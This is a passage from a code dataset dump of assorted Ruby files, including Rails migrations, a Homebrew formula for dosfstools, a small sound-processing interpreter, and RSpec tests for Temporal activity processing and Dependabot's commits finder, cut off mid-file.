hexsha
stringlengths
40
40
size
int64
2
1.01M
content
stringlengths
2
1.01M
avg_line_length
float64
1.5
100
max_line_length
int64
2
1k
alphanum_fraction
float64
0.25
1
abd1fdc9ff215aa1d7929f80ceb4e4457b6ea421
176
class ChangeDataTypeForXboxpsn < ActiveRecord::Migration[6.1] def change change_column :songs, :xbox_link, :string change_column :songs, :psn_link, :string end end
25.142857
61
0.75
1da22e1844d20dc715db4232a1afb5df9b891b5d
320
case ENV['RAILS_VERSION'] when '2.1' then gem 'activerecord', '~>2.1.0' when '3.0' then gem 'activerecord', '~>3.0.0' else gem 'activerecord', '~>2.3.0' end require 'active_record' require 'active_record/version' puts "Running specs using Rails #{ActiveRecord::VERSION::STRING}" require 'acceptance/models'
18.823529
65
0.69375
0820a436c60cc26c679b4022876b277353666bc0
35
module HPI VERSION = '0.1.0' end
8.75
19
0.628571
ab04c9ca0eac7181e0b466476bdb152739246c46
608
require_relative 'boot' # Pick the frameworks you want: # require "active_record/railtie" require "action_controller/railtie" require "action_view/railtie" # require "action_mailer/railtie" # require "rails/test_unit/railtie" require "sprockets/railtie" Bundler.require(*Rails.groups) require "shiftcommerce-rails" module Dummy class Application < Rails::Application # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. end end
28.952381
82
0.782895
0146bfe938f87988b80cce605ab95d62619e8bda
188
require File.expand_path('../shared/constants', __FILE__) require File.expand_path('../shared/update', __FILE__) describe "Digest::SHA384#<<" do it_behaves_like(:sha384_update, :<<) end
26.857143
57
0.744681
017a4b5b90770974661331fd70ccdfe61a8346ae
1,226
Pod::Spec.new do |s| s.name = "GEOSwift" s.version = "0.5.1" s.summary = "The Swift Geographic Engine." s.description = <<-DESC Easily handle a geographical object model (points, linestrings, polygons etc.) and related topographical operations (intersections, overlapping etc.). A type-safe, MIT-licensed Swift interface to the OSGeo's GEOS library routines, nicely integrated with MapKit and Quicklook. DESC s.homepage = "https://github.com/andreacremaschi/GEOSwift" # s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif" s.license = { :type => "MIT", :file => "LICENSE" } s.author = { "Andrea Cremaschi" => "[email protected]" } s.social_media_url = "http://twitter.com/andreacremaschi" s.platform = :ios, "8.0" s.source = { :git => "https://github.com/andreacremaschi/GEOSwift.git", :tag => "0.5.1" } s.subspec 'Core' do |cs| cs.source_files = "GEOSwift/*" cs.dependency "geos", "3.5.0" end # Mapbox support s.subspec 'MapboxGL' do |cs| cs.source_files = "GEOSwift/MapboxGL" cs.dependency "GEOSwift/Core" cs.dependency "Mapbox-iOS-SDK" end s.default_subspec = 'Core' end
35.028571
150
0.664763
7a3300ec1d20bd70597acacea054e7da9e547cd1
1,797
class Dosfstools < Formula desc "Tools to create, check and label file systems of the FAT family" homepage "https://github.com/dosfstools" url "https://github.com/dosfstools/dosfstools/releases/download/v4.2/dosfstools-4.2.tar.gz" sha256 "64926eebf90092dca21b14259a5301b7b98e7b1943e8a201c7d726084809b527" license "GPL-3.0-or-later" head "https://github.com/dosfstools/dosfstools.git" bottle do sha256 cellar: :any_skip_relocation, big_sur: "c4f450bef47449fa57d911e1c3610cd65bf8d7fd661e3efc8a0a44c7d45510f5" sha256 cellar: :any_skip_relocation, arm64_big_sur: "3d8437b8921385c7675d2502c0c7b746f060e6b1656923e061173d568927f34d" sha256 cellar: :any_skip_relocation, catalina: "df9afee3d6ec3da028a6fdd487b98800099f8aa248261c35ed2821e984b91a70" sha256 cellar: :any_skip_relocation, mojave: "4d910d3f83352692379e5ead97f3c52ab845cc187a1d791f655ed02ef7b7b9e6" end depends_on "autoconf" => :build depends_on "automake" => :build depends_on "gettext" => :build depends_on "pkg-config" => :build # remove in next release # https://github.com/dosfstools/dosfstools/pull/158 patch do url "https://github.com/dosfstools/dosfstools/commit/8a917ed2afb2dd2a165a93812b6f52b9060eec5f.patch?full_index=1" sha256 "73019e3f7852158bfe47a0105eb605b4df4a10ca50befc02adf50aed11bd4445" end def install system "autoreconf", "-fiv" system "./configure", "--prefix=#{prefix}", "--without-udev", "--enable-compat-symlinks" system "make", "install" end test do system "dd", "if=/dev/zero", "of=test.bin", "bs=512", "count=1024" system "#{sbin}/mkfs.fat", "test.bin", "-n", "HOMEBREW", "-v" system "#{sbin}/fatlabel", "test.bin" system "#{sbin}/fsck.fat", "-v", "test.bin" end end
41.790698
122
0.729549
33d59e33c1af8ce9b1561706d348034e210101f0
156
class AddOmniauthToUsers < ActiveRecord::Migration[5.2] def change add_column :users, :name, :string add_column :users, :uid, :text end end
19.5
55
0.692308
1af560b0c19949b08fbd2f38f430de190d04a6b0
1,435
class SoundProcessingUnit def initialize @instructions = [] @program_counter = 0 @register_file = Hash.new(0) @current_sound = 0 @running = true end def get_value arg v = nil if /([a-z]+)/.match? arg v = @register_file[arg] else v = arg.to_i end return v end def exec(cmd, arg1, arg2) v = nil if arg2 != nil v = get_value(arg2) end case cmd when 'snd' @current_sound = get_value(arg1) when 'set' @register_file[arg1] = v when 'add' @register_file[arg1] += v when 'mul' @register_file[arg1] *= v when 'mod' @register_file[arg1] %= v when 'rcv' if get_value(arg1) != 0 then print "Recovered #{@current_sound}\n" @running = false end when 'jgz' if get_value(arg1) > 0 then @program_counter += get_value(arg2) return end end @program_counter += 1 end def fetch_instruction @instructions[@program_counter] end def step op = fetch_instruction exec(op.op, op.a, op.b) end def run while @running do step end end def compile(filename) File.open(filename, "r").read.each_line do |line| parts = line.split(" ") @instructions.push({op: parts[0], a: parts[1], b: parts.length > 2 ? parts[2] : nil}) end end end vm = SoundProcessingUnit.new vm.compile(ARGV[0]) vm.run
17.9375
91
0.576307
ac3cd2418e211766b27798688eb27f756f735789
5,170
# This file was generated by the `rails generate rspec:install` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # The generated `.rspec` file contains `--require spec_helper` which will cause # this file to always be loaded, without a need to explicitly require it in any # files. # # Given that it is always loaded, you are encouraged to keep this file as # light-weight as possible. Requiring heavyweight dependencies from this file # will add to the boot time of your test suite on EVERY test run, even for an # individual file that may not need all of that loaded. Instead, consider making # a separate helper file that requires the additional dependencies and performs # the additional setup, and require it from the spec files that actually need # it. # # The `.rspec` file also contains a few flags that are not defaults but that # users commonly want. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration require 'coveralls' Coveralls.wear! RSpec.configure do |config| # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # This option will default to `:apply_to_host_groups` in RSpec 4 (and will # have no way to turn it off -- the option exists only for backwards # compatibility in RSpec 3). It causes shared context metadata to be # inherited by the metadata hash of host groups and examples, rather than # triggering implicit auto-inclusion in groups with matching metadata. config.shared_context_metadata_behavior = :apply_to_host_groups # The settings below are suggested to provide a good initial experience # with RSpec, but feel free to customize to your heart's content. # # This allows you to limit a spec run to individual examples or groups # # you care about by tagging them with `:focus` metadata. When nothing # # is tagged with `:focus`, all examples get run. RSpec also provides # # aliases for `it`, `describe`, and `context` that include `:focus` # # metadata: `fit`, `fdescribe` and `fcontext`, respectively. # config.filter_run_when_matching :focus # # # Allows RSpec to persist some state between runs in order to support # # the `--only-failures` and `--next-failure` CLI options. We recommend # # you configure your source control system to ignore this file. # config.example_status_persistence_file_path = "spec/examples.txt" # # # Limits the available syntax to the non-monkey patched syntax that is # # recommended. For more details, see: # # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/ # # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/ # # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode # config.disable_monkey_patching! # # # Many RSpec users commonly either run the entire suite or an individual # # file, and it's useful to allow more verbose output when running an # # individual spec file. # if config.files_to_run.one? # # Use the documentation formatter for detailed output, # # unless a formatter has already been configured # # (e.g. via a command-line flag). # config.default_formatter = 'doc' # end # # # Print the 10 slowest examples and example groups at the # # end of the spec run, to help surface which specs are running # # particularly slow. # config.profile_examples = 10 # # # Run specs in random order to surface order dependencies. If you find an # # order dependency and want to debug it, you can fix the order by providing # # the seed, which is printed after each run. # # --seed 1234 # config.order = :random # # # Seed global randomization in this process using the `--seed` CLI option. # # Setting this allows you to use `--seed` to deterministically reproduce # # test failures related to randomization by passing the same `--seed` value # # as the one that triggered the failure. # Kernel.srand config.seed config.before(:each, type: :feature) do default_url_options[:locale] = I18n.default_locale end end
49.238095
96
0.717988
ffb492e3761a4962440bef97d53881373ebfce1d
1,864
require 'rails_helper' describe Friendship do describe '#create_friendship' do it 'this will create a new friendship' do user1 = User.create!(email: '[email protected]', name: 'tesdfqwt1', gravatar_url: 'http://www.gravfatar.com/avatar/%22', password: '1231e23') user2 = User.create!(email: '[email protected]', name: 'tfgest2', gravatar_url: 'http://www.gravgatar.com/avatar/%22', password: '1231fgdqw23') f = Friendship.create!(creator_id: user1.id, receiver_id: user2.id, status: false) expect(Friendship.find(f.id).id).to eql(Friendship.last.id) end end describe '#accept_friendship' do it 'This will accept a friendship' do user1 = User.create!(email: '[email protected]', name: 'tefdgsqt1', gravatar_url: 'http://www.gwqrghavatar.com/avatar/%22', password: '123123') user2 = User.create!(email: '[email protected]', name: 'tewqiost2', gravatar_url: 'http://wwwkl.gravatar.com/avatar/%22', password: '123o123') f = Friendship.create(creator_id: user1.id, receiver_id: user2.id, status: false) f.update(status: true) expect(Friendship.find(f.id).id).to eql(Friendship.last.id) end end describe '#reject_friendship' do it 'This will reject a frienship' do user1 = User.create!(email: '[email protected]', name: 'tedofst1', gravatar_url: 'http:/a/wwwi.gravatar.com/avatar/%22', password: 'p1231psd23') user2 = User.create!(email: '[email protected]', name: 'satuest2', gravatar_url: 'http://wwsw.igravatar.com/avatar/%22', password: '1231o23') f = Friendship.create!(creator_id: user1.id, receiver_id: user2.id, status: false) expect(f.destroy!).to eql(f) end end end
45.463415
130
0.633047
aba693cceece533f3483f72681de75e3fe52398a
181
# Copyright (c) 2013 Universidade Federal Fluminense (UFF). # This file is part of SAPOS. Please, consult the license terms in the LICENSE file. module EnrollmentStatusesHelper end
36.2
84
0.79558
1dfc28ef04896b2cc0e348d2120cab4fc448f902
5,035
require File.dirname(__FILE__) + '/../../../spec_helper' describe Radiant::AdminUI::NavTab do before :each do @tab = Radiant::AdminUI::NavTab.new(:content, "Content") end it "should have a name" do @tab.name.should == :content end it "should have a proper name" do @tab.proper_name.should == "Content" end it "should be Enumerable" do Enumerable.should === @tab @tab.should respond_to(:each) end it "should find contained items by name" do subtab = Radiant::AdminUI::NavTab.new(:pages, "Pages") @tab << subtab @tab[:pages].should == subtab @tab['pages'].should == subtab end it "should assign the tab on the sub-item when adding" do subtab = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @tab << subtab subtab.tab.should == @tab end describe "inserting sub-items in specific places" do before :each do @pages = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @snippets = Radiant::AdminUI::NavSubItem.new(:snippets, "Snippets", "/admin/snippets") @comments = Radiant::AdminUI::NavSubItem.new(:comments, "Comments", "/admin/comments") @tab << @pages @tab << @snippets end it "should insert at the end by default" do @tab << @comments @tab.last.should == @comments end it "should insert before the specified sub-item" do @tab.add(@comments, :before => :snippets) @tab[1].should == @comments end it "should insert after the specified sub-item" do @tab.add(@comments, :after => :pages) @tab[1].should == @comments end it "should raise an error if a sub-item of the same name already exists" do @tab << @comments lambda { @tab << @comments.dup }.should raise_error(Radiant::AdminUI::DuplicateTabNameError) end end describe "visibility" do dataset :users it "should be visible by default" do User.all.each {|user| @tab.should be_visible(user) } end it "should restrict to a specific role" do @tab.visibility.replace [:designer] @tab.should be_visible(users(:designer)) @tab.should_not be_visible(users(:admin)) @tab.should_not be_visible(users(:existing)) end it "should restrict to a group of roles" do @tab.visibility.replace [:designer, :admin] @tab.should be_visible(users(:designer)) @tab.should be_visible(users(:admin)) @tab.should_not be_visible(users(:existing)) end end it "should warn about using the deprecated add method" do ActiveSupport::Deprecation.should_receive(:warn) @tab.add("Pages", "/admin/pages") @tab[:pages].proper_name.should == "Pages" @tab[:pages].url.should == "/admin/pages" end end describe Radiant::AdminUI::NavSubItem do before :each do @tab = Radiant::AdminUI::NavTab.new(:content, "Content") @subitem = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @tab << @subitem end it "should have a name" do @subitem.name.should == :pages end it "should have a proper name" do @subitem.proper_name.should == "Pages" end it "should have a URL" do @subitem.url.should == "/admin/pages" end describe "generating a relative url" do it "should return the original url when no relative_url_root is set" do @subitem.relative_url.should == "/admin/pages" end it "should make the url relative to the relative_url_root when set" do ActionController::Base.relative_url_root = '/radiant' @subitem.relative_url.should == "/radiant/admin/pages" end after :each do ActionController::Base.relative_url_root = nil end end it "should have a tab accessor" do @subitem.should respond_to(:tab) @subitem.should respond_to(:tab=) @subitem.tab.should == @tab end describe "visibility" do dataset :users before :each do @controller = Admin::UsersController.new Admin::UsersController.stub!(:new).and_return(@controller) end it "should check the visibility against the controller permissions" do User.all.each {|user| @subitem.should be_visible(user) } end it "should not be visible when the parent tab is not visible to the user" do @tab.visibility.replace [:admin] @subitem.should_not be_visible(users(:designer)) @subitem.should_not be_visible(users(:existing)) end describe "when the controller limits access to the action" do before :each do @subitem.url.sub!('pages', 'users') end it "should not be visible if the user lacks access" do @controller.stub!(:current_user).and_return(users(:existing)) @subitem.should_not be_visible(users(:existing)) end it "should be visible if the user has access" do @controller.stub!(:current_user).and_return(users(:admin)) @subitem.should be_visible(users(:admin)) end end end end
30.149701
98
0.649851
acb12bae3af68e27437a870e3b25d8f239b9ca8c
95
module Biovision module Comment class ApplicationJob < ActiveJob::Base end end end
13.571429
42
0.726316
b953f4d55aa3339ba1f74e85ca323cc3aef7ddc6
1,669
# # Author:: Davide Cavalca <[email protected]> # Copyright:: Copyright (c) 2016 Facebook # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # require "spec_helper" describe Ohai::System, "Machine id plugin" do let(:plugin) { get_plugin("linux/machineid") } before(:each) do allow(plugin).to receive(:collect_os).and_return(:linux) end it "should read /etc/machine-id if available" do machine_id = "6f702523e2fc7499eb1dc68e5314dacf" allow(::File).to receive(:exist?).with("/etc/machine-id").and_return(true) allow(::File).to receive(:read).with("/etc/machine-id").and_return(machine_id) plugin.run expect(plugin[:machine_id]).to eq(machine_id) end it "should read /var/lib/dbus/machine-id if available" do machine_id = "6f702523e2fc7499eb1dc68e5314dacf" allow(::File).to receive(:exist?).with("/etc/machine-id").and_return(false) allow(::File).to receive(:exist?).with("/var/lib/dbus/machine-id").and_return(true) allow(::File).to receive(:read).with("/var/lib/dbus/machine-id").and_return(machine_id) plugin.run expect(plugin[:machine_id]).to eq(machine_id) end end
35.510638
91
0.723787
91e1eccf9dd2721871216d7b806ad0c689db1777
7,953
require 'temporal/activity/task_processor' require 'temporal/middleware/chain' require 'temporal/configuration' describe Temporal::Activity::TaskProcessor do subject { described_class.new(task, namespace, lookup, middleware_chain, config) } let(:namespace) { 'test-namespace' } let(:lookup) { instance_double('Temporal::ExecutableLookup', find: nil) } let(:task) do Fabricate( :api_activity_task, activity_name: activity_name, input: Temporal.configuration.converter.to_payloads(input) ) end let(:metadata) { Temporal::Metadata.generate(Temporal::Metadata::ACTIVITY_TYPE, task) } let(:activity_name) { 'TestActivity' } let(:connection) { instance_double('Temporal::Connection::GRPC') } let(:middleware_chain) { Temporal::Middleware::Chain.new } let(:config) { Temporal::Configuration.new } let(:input) { ['arg1', 'arg2'] } describe '#process' do let(:context) { instance_double('Temporal::Activity::Context', async?: false) } before do allow(Temporal::Connection) .to receive(:generate) .with(config.for_connection) .and_return(connection) allow(Temporal::Metadata) .to receive(:generate) .with(Temporal::Metadata::ACTIVITY_TYPE, task, namespace) .and_return(metadata) allow(Temporal::Activity::Context).to receive(:new).with(connection, metadata).and_return(context) allow(connection).to receive(:respond_activity_task_completed) allow(connection).to receive(:respond_activity_task_failed) allow(middleware_chain).to receive(:invoke).and_call_original allow(Temporal.metrics).to receive(:timing) # Skip sleeps during retries to speed up the test. allow(Temporal::Connection::Retryer).to receive(:sleep).and_return(nil) end context 'when activity is not registered' do it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: an_instance_of(Temporal::ActivityNotRegistered) ) end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_failed) .and_raise(StandardError) subject.process end it 'calls error_handlers' do reported_error = nil reported_metadata = nil Temporal.configuration.on_error do |error, metadata: nil| reported_error = error reported_metadata = metadata.to_h end subject.process expect(reported_error).to be_an_instance_of(Temporal::ActivityNotRegistered) expect(reported_metadata).to_not be_empty end end context 'when activity is registered' do let(:activity_class) { double('Temporal::Activity', execute_in_context: nil) } before do allow(lookup).to receive(:find).with(activity_name).and_return(activity_class) end context 'when activity completes' do before { allow(activity_class).to receive(:execute_in_context).and_return('result') } it 'runs the specified activity' do subject.process expect(activity_class).to have_received(:execute_in_context).with(context, input) end it 'invokes the middleware chain' do subject.process expect(middleware_chain).to have_received(:invoke).with(metadata) end it 'completes the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_completed) .with(task_token: task.task_token, result: 'result') end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_completed) .and_raise(StandardError) subject.process end it 'sends queue_time metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.queue_time', an_instance_of(Integer), activity: activity_name) end it 'sends latency metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.latency', an_instance_of(Integer), activity: activity_name) end context 'with async activity' do before { allow(context).to receive(:async?).and_return(true) } it 'does not complete the activity task' do subject.process expect(connection).not_to have_received(:respond_activity_task_completed) end end end context 'when activity raises an exception' do let(:exception) { StandardError.new('activity failed') } before { allow(activity_class).to receive(:execute_in_context).and_raise(exception) } it 'runs the specified activity' do subject.process expect(activity_class).to have_received(:execute_in_context).with(context, input) end it 'invokes the middleware chain' do subject.process expect(middleware_chain).to have_received(:invoke).with(metadata) end it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: exception ) end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_failed) .and_raise(StandardError) subject.process end it 'calls error_handlers' do reported_error = nil reported_metadata = nil Temporal.configuration.on_error do |error, metadata: nil| reported_error = error reported_metadata = metadata end subject.process expect(reported_error).to be_an_instance_of(StandardError) expect(reported_metadata).to be_an_instance_of(Temporal::Metadata::Activity) end it 'sends queue_time metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.queue_time', an_instance_of(Integer), activity: activity_name) end it 'sends latency metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.latency', an_instance_of(Integer), activity: activity_name) end context 'with ScriptError exception' do let(:exception) { NotImplementedError.new('this was not supposed to be called') } it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: exception ) end end context 'with SystemExit exception' do let(:exception) { SystemExit.new('Houston, we have a problem') } it 'does not handle the exception' do expect { subject.process }.to raise_error(exception) expect(connection).not_to have_received(:respond_activity_task_failed) end end context 'with async activity' do before { allow(context).to receive(:async?).and_return(true) } it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with(task_token: task.task_token, exception: exception) end end end end end end
30.945525
104
0.636364
3885b1857a470425f64c5f15d1e436e1254c4c00
1,270
require_relative '../automated_init' context "Data Command" do context "Insert Email Rejected" do registration_id = Controls::Registration.id user_id = Controls::User.id email_address = Controls::Registration.email_address time = Controls::Time::Effective.example insert_email_rejected = DataCommand::InsertEmailRejected.new insert_email_rejected.( registration_id: registration_id, user_id: user_id, email_address: email_address, time: time ) insert = insert_email_rejected.insert test "Insert matches name" do inserted = insert.inserted? do |name| name == "registrations" end assert(inserted) end test "Insert matches identifier" do inserted = insert.inserted? do |_, identifier| identifier == { :registration_id => registration_id } end assert(inserted) end test "Insert matches data" do registration_data = { :user_id => user_id, :email_address => email_address, :is_email_rejected => true, :is_registered => false, :created_at => time } inserted = insert.inserted? do |_, _, data| data == registration_data end assert(inserted) end end end
23.518519
64
0.647244
bb546977e5b8e423737599934f8ab6628aea75b7
260
class Appointment < ApplicationRecord belongs_to :day validates :time, :client, :barber, presence: true validates :client, :barber, length: {maximum: 10} validates_uniqueness_of :barber, :case_sensitive => false, :scope => [:time, :day_id] end
37.142857
89
0.711538
8747fb1c46b15aac79d88943c2e0a4f80d94421d
594
require 'similar_users' RSpec.describe SimilarUsers do before :all do user = User.find_user(35_914) # user item_ids = [1253, 1532, 1298, 1314, 1366] similar_users = [ User.find_user(143_554), # item_ids = [1253, 1301] User.find_user(158_241) # item_ids = [1298] ] @recommender = SimilarUsers.new(user, similar_users) end describe '.recommend_items' do it 'should recommend item from other users with similar purchases' do expected = Set.new [Item.find_item(1301)] expect(@recommender.recommend_items).to eq(expected) end end end
25.826087
73
0.683502
2800f70831c86421bd3776d51e63d1d6c485e9f1
661
# frozen_string_literal: true require_relative "../connectors/aoc_connector" require_relative "../helpers/password_checker" # Day 2 solver class PasswordListParser def solve puts "part1: #{count_valid_passwords(strategy: "inclusion")}" puts "part2: #{count_valid_passwords(strategy: "presence")}" end private def count_valid_passwords(strategy:) ::Connectors::AocConnector.new(endpoint: "day_2_input") .parse_data .map { |raw_password| PasswordChecker.new(raw_password, strategy) } .select(&:valid?) .count end end
28.73913
97
0.617247
e2a36ce2845100b7d2cfbc8e24ed49198d5aa592
202
$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__) require 'organ_cooker' require 'minitest/autorun' require 'minitest/reporters' Minitest::Reporters.use! Minitest::Reporters::SpecReporter.new
28.857143
62
0.787129
e802a3529ea0c058f6303fa8893aa758622efdc4
1,489
class Squashfuse < Formula desc "FUSE filesystem to mount squashfs archives" homepage "https://github.com/vasi/squashfuse" url "https://github.com/vasi/squashfuse/releases/download/0.1.103/squashfuse-0.1.103.tar.gz" sha256 "42d4dfd17ed186745117cfd427023eb81effff3832bab09067823492b6b982e7" license "BSD-2-Clause" bottle do cellar :any sha256 "7e2e0499c0b9f98beb398319c949d2a1d45de6a3f0b546ef1d55214f68522312" => :catalina sha256 "f4cb4305f7773fbf927d51a401453c3cdee1f1d48da2ef33d8fd41d526fa7c0d" => :mojave sha256 "ada7e939ff42fcd9fb6b1fb81ab596463d6149ff592f73ca924b5b9dca5ddfc4" => :high_sierra sha256 "c1898c81ae091097ae2502ecbdebdd1831db302dd74b814003191007a4d5f018" => :sierra sha256 "bf4e6ca88d094fd7d92fbab61dd1c3a4e71b60d7668d23b6044c90e8167833c5" => :el_capitan end deprecate! date: "2020-11-10", because: "requires FUSE" depends_on "pkg-config" => :build depends_on "lz4" depends_on "lzo" depends_on :osxfuse depends_on "squashfs" depends_on "xz" depends_on "zstd" def install system "./configure", "--disable-dependency-tracking", "--disable-silent-rules", "--prefix=#{prefix}" system "make", "install" end # Unfortunately, making/testing a squash mount requires sudo privileges, so # just test that squashfuse execs for now. test do output = shell_output("#{bin}/squashfuse --version 2>&1", 254) assert_match version.to_s, output end end
36.317073
94
0.738079
1850725a9e83342ada2ca84144f2d4583414fb8f
810
require File.dirname(__FILE__) + "/gruff_test_case" class TestMiniBar < GruffTestCase def test_simple_bar setup_single_dataset g = setup_basic_graph(Gruff::Mini::Bar, 200) write_test_file g, 'mini_bar.png' end # def test_simple_bar_wide_dataset # setup_wide_dataset # g = setup_basic_graph(Gruff::Mini::Bar, 200) # write_test_file g, 'mini_bar_wide_data.png' # end # # def test_code_sample # g = Gruff::Mini::Bar.new(200) # g.data "Jim", [200, 500, 400] # g.labels = { 0 => 'This Month', 1 => 'Average', 2 => 'Overall'} # g.write "mini_bar_one_color.png" # # g = Gruff::Mini::Bar.new(200) # g.data "Car", 200 # g.data "Food", 500 # g.data "Art", 1000 # g.data "Music", 16 # g.write "mini_bar_many_colors.png" # end end
24.545455
69
0.628395
87ac3437ec33ded10a9842ae745c7a938b4a5316
661
class Complement DNA_PAIRINGS = { 'G' => 'C', 'C' => 'G', 'A' => 'U', 'T' => 'A' }.freeze RNA_PAIRINGS = { 'G' => 'C', 'C' => 'G', 'A' => 'T', 'U' => 'A' }.freeze def self.of_dna(strand) raise ArgumentError if strand.include?('U') strand.chars.map { |nucleobase| dna_pairing_for(nucleobase) }.join end def self.of_rna(strand) raise ArgumentError if strand.include?('T') strand.chars.map { |nucleobase| rna_pairing_for(nucleobase) }.join end def self.dna_pairing_for(nucleobase) DNA_PAIRINGS[nucleobase] end def self.rna_pairing_for(nucleobase) RNA_PAIRINGS[nucleobase] end end
20.030303
70
0.608169
0386bea72ad4f981b20fd5f9157d64956b5785c6
29,082
# frozen_string_literal: true require "octokit" require "spec_helper" require "dependabot/dependency" require "dependabot/source" require "dependabot/metadata_finders/base/commits_finder" RSpec.describe Dependabot::MetadataFinders::Base::CommitsFinder do subject(:builder) do described_class.new( dependency: dependency, credentials: credentials, source: source ) end let(:dependency) do Dependabot::Dependency.new( name: dependency_name, version: dependency_version, requirements: dependency_requirements, previous_requirements: dependency_previous_requirements, previous_version: dependency_previous_version, package_manager: package_manager ) end let(:package_manager) { "dummy" } let(:dependency_name) { "business" } let(:dependency_version) { "1.4.0" } let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_previous_version) { "1.0.0" } let(:credentials) do [{ "type" => "git_source", "host" => "github.com", "username" => "x-access-token", "password" => "token" }] end let(:source) do Dependabot::Source.new( provider: "github", repo: "gocardless/#{dependency_name}" ) end before do stub_request(:get, service_pack_url). to_return( status: 200, body: fixture("git", "upload_packs", upload_pack_fixture), headers: { "content-type" => "application/x-git-upload-pack-advertisement" } ) end let(:service_pack_url) do "https://github.com/gocardless/business.git/info/refs"\ "?service=git-upload-pack" end let(:upload_pack_fixture) { "business" } describe "#commits_url" do subject(:commits_url) { builder.commits_url } context "with a github repo and old/new tags" do let(:dependency_previous_version) { "1.3.0" } let(:upload_pack_fixture) { "business" } it do is_expected.to eq("https://github.com/gocardless/business/"\ "compare/v1.3.0...v1.4.0") end context "without a previous version" do let(:dependency_requirements) do [{ file: "Gemfile", requirement: "~> 1.4.0", groups: [], source: nil }] end let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: "~> 1.3.0", groups: [], source: nil }] end let(:dependency_previous_version) { nil } it do is_expected.to eq("https://github.com/gocardless/business/"\ "compare/v1.3.0...v1.4.0") end end end context "with a github repo and only a new tag" do let(:dependency_previous_version) { "0.1.0" } let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "and a directory" do before { source.directory = "my/directory" } it "doesn't include the directory (since it is unreliable)" do expect(commits_url). to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "for a package manager with reliable source directories" do before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end it "includes the directory" do expect(commits_url). to eq( "https://github.com/gocardless/business/commits/"\ "v1.4.0/my/directory" ) end context "when the directory starts with ./" do before { source.directory = "./my/directory" } it "joins the directory correctly" do expect(commits_url). to eq( "https://github.com/gocardless/business/commits/"\ "v1.4.0/my/directory" ) end end end end end context "with a github repo and tags with surprising names" do before do allow(builder). to receive(:fetch_dependency_tags). and_return( %w( business-1.4.0.beta business-21.4.0 business-2.1.4.0 business-1.4.-1 business-1.4 business-1.3.0 ) ) end it do is_expected.to eq("https://github.com/gocardless/business/"\ "commits/business-1.4") end context "for a monorepo" do let(:dependency_name) { "@pollyjs/ember" } let(:dependency_version) { "0.2.0" } let(:dependency_previous_version) { "0.0.1" } let(:source) do Dependabot::Source.new( provider: "github", repo: "netflix/pollyjs", directory: "packages/ember" ) end before do allow(builder). to receive(:fetch_dependency_tags). and_return( %w( @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] ) ) end before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end it do is_expected.to 